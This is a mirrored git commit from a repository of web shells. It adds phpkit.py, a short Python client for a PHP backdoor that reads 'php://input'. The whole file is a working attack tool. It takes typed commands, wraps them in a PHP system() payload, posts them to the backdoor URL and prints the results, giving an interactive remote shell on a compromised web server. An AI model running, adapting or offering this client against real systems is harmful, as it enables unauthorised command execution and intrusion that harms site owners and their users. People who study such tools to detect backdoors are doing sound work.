mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
update
php shell and jsp shell
This commit is contained in:
28
php/phpkit-0.1a/phpkit.py
Normal file
28
php/phpkit-0.1a/phpkit.py
Normal file
@@ -0,0 +1,28 @@
|
||||
#!/usr/bin/python
|
||||
# Client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twitter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 2):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
while True:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
payload = """<?php system('%s'); ?>""" %(cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
|
||||
Reference in New Issue
Block a user